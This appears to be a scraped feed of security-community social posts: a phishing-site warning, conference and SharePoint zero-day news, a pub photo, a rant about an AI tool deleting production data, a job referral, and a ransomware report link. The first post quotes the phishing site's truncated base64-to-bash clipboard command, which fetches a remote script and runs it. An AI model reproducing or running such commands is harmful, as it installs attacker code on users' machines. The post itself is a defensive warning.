| Site | https://cryptolek.info/ |
This is pretty well executed phishing.
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.
They even detect piping, so to read it you have to run "curl | cat".
Talks from the SLEUTHCON 2025 security conference, which took place in June, are now available on YouTube
https://www.youtube.com/playlist?list=PL_ru_VvzvvT8WywRo1Vr0MbQ9leO0k21e
NEW: The hackers that have been exploiting the Microsoft SharePoint zero-day have been targeting government agencies, researchers say.
Also, different research teams are seeing more than 8,000 exposed and potentially vulnerable SharePoint servers on the internet.
Took this photo in the backyard of Pivoteka13 pub in Opava City, Czechia. The Michelin guy you would recognise, but what about the monument?
That colorful guy shaped into a monument is Ivan Konev. Marshal of the Soviet Union who led the troops on the Eastern Front. Also, the first allied commander who entered Prague.
The used to be more of his monuments in Czechoslovakia, including a big one in Prague, which was removed in 2020. Tbh, this colorful Ivan Konev is my favorite one xD
And probably you have seen the news of CZ criminalising the promotion of communist ideology. Anyways, the pub is my favorite one. It has a very good selection of beers from microbreweries and really nice patrons.
#Pivoteka13 #Opava #Czechia #Czechoslovakia #Prague #Praha #IvanKonev
So, reading through today's "ai" horror story - link below, it's where this SaaS dude has been vibe coding and let a product called "Replit" have access to prod and apparently delete it - there's something -very- striking that's stood out to me.
The guy asks the 'ai' for what "he" - note the wholly inappropriate anthropomorphization - had done and why.
And then trusts the response.
Now, not to put too fine a point on it, but this is in a context where the human involved has notated -multiple- times that the damn fool thing had made shit up wholesale multiple times.
Why in the fuck did he - the person; I refuse to assign a gender to a machine - trust the LLM's output instead of having transaction logging enabled to audit the actions that the machine had made on the systems in question?
This is some very fucking basic SDLC practice shit that apparently they have failed to implement.
LLM usage rots people's brains, and this is yet more evidence of that.
Helping out a friend who is looking for a new gig:
- GRC, vendor management / 3rd party, control assessment gig
- 10 years experience
- Orlando FL or remote
- great guy to work with
- MS MIS, BS Cybersecurity
- GSEC
if you know of anything, please let me know. Happy to connect.
Well, thanks for @openfactory for responding to my support ticket in 7 minutes, pointing me in the right direction.
My OPNsense had somehow managed to mess up the MTU of my PPPoE interface and manually setting it to 1492 fixed it.
Gotta love the wonkiness of PPPoE.
In case you're looking for a pretty thorough Ransomware Threat Landscape report perhaps you'll find:
https://cstromblad.com/posts/ransomware-threat-landscape-may-july-2025/
... useful. It's an aggregated view across approximately 48 articles spanning May through July. It's not perfect, but I do believe it's one of the better ones out there IMHO.
If you spot any glaring omissions or simply incorrect "things", just let me know and I would be happy to adjust and correct the misinformation.
In this analysis the ransomware threat landscape has been analyzed as it can be perceived using open sources intelligence. A total of 48 articles have been used to produce this analysis and provides significant insights into the ransomware ecosystem, modus operandi and other valuable insights that can be used to defend better against ransomware.
Filippo Valsorda (🏝️🔙 Aug 1)
Kevin Dominik Korte
Catalin Cimpanu
Lorenzo Franceschi-Bicchierai
Fi 🏳️⚧️
Marco Tietz
Jana
CatSalad🐈🥗 (D.Burch) 
Christoffer S.